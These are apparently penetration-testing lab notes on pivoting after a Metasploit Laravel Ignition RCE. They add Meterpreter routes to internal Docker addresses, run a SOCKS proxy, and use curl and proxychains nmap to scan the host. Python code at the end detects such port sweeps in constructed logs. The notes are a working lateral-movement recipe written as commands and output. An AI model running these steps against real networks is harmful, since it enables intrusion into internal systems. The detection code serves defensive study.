## Command

Routing the Service

```
# The discovered webservice_database IP will be routed through the Meterpreter session
msf6 exploit(multi/php/ignition_laravel_debug_rce) > route add 172.28.101.51/32 -1
[*] Route added
```

- website_database ---> This comes from the .env variable in the Docker file

Routing the Machine

```
msf6 exploit(multi/php/ignition_laravel_debug_rce) > route add 172.17.0.1/32 -1
[*] Route added
```

Check the routing settings

```
msf6 exploit(multi/php/ignition_laravel_debug_rce) > route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   172.17.0.1         255.255.255.255    Session 3
   172.28.101.51      255.255.255.255    Session 3

[*] There are currently no IPv6 routes defined.
```

Set up the SOCKS proxy

```
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 1.
[*] Starting the SOCKS proxy server
```

Using the target machine

```
# From the attacker’s host machine, we can use curl with the internal Docker IP to show that the web application is running and that the SOCKS proxy works
$ curl --proxy socks4a://localhost:9050 http://172.17.0.1 -v
… etc …

# From the attacker’s host machine, we can use ProxyChains to scan the compromised host machine for common ports
$ proxychains -q nmap -n -sT -Pn -p 22,80,443,5432 172.17.0.1
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 08:48 EDT
Nmap scan report for 172.17.0.1
Host is up (0.069s latency).

PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
443/tcp  closed https
5432/tcp closed postgresql

Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
```
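
Seen from the defended network, the proxied connect scan above arrives as a short burst of TCP connections from the system running the Meterpreter session, not from the attacker's own machine. The following is an added example, not part of the original notes, that flags such bursts in connection records; the log format, the source address 172.17.0.2 and the thresholds are assumptions, and the sample records are constructed.

```python
from collections import defaultdict

# Constructed sample records: epoch seconds, source, destination, dest port, outcome.
# 172.17.0.2 is an assumed address for the system hosting the Meterpreter session.
SAMPLE_LOG = """\
1666615680.10 172.17.0.2 172.17.0.1 22 established
1666615680.17 172.17.0.2 172.17.0.1 80 established
1666615680.24 172.17.0.2 172.17.0.1 443 reset
1666615680.31 172.17.0.2 172.17.0.1 5432 reset
1666615700.00 172.17.0.3 172.17.0.1 80 established
1666615760.00 172.17.0.3 172.17.0.1 80 established
1666615900.00 172.17.0.2 172.28.101.51 5432 established
"""

def parse(log):
    """Yield (ts, src, dst, port, outcome) tuples, skipping malformed lines."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, src, dst, port, outcome = parts
        yield float(ts), src, dst, int(port), outcome

def find_port_sweeps(log, window=5.0, min_ports=4):
    """Flag source/destination pairs that touch min_ports distinct ports within window seconds."""
    by_pair = defaultdict(list)
    for ts, src, dst, port, outcome in parse(log):
        by_pair[(src, dst)].append((ts, port, outcome))
    alerts = []
    for (src, dst), events in sorted(by_pair.items()):
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until the burst fits in `window` seconds.
            while events[end][0] - events[start][0] > window:
                start += 1
            burst = events[start:end + 1]
            ports = sorted({p for _, p, _ in burst})
            if len(ports) >= min_ports:
                # Refused ports separate a sweep from a client talking to known services.
                refused = sorted({p for _, p, o in burst if o == "reset"})
                alerts.append({"src": src, "dst": dst, "ports": ports, "refused": refused})
                break  # one alert per pair is enough
    return alerts

if __name__ == "__main__":
    for alert in find_port_sweeps(SAMPLE_LOG):
        print(alert)
```

In a container deployment, an application container opening connections to SSH and to closed ports on its own Docker host within a fraction of a second is rarely legitimate, so a low `min_ports` threshold is usually workable for this source class.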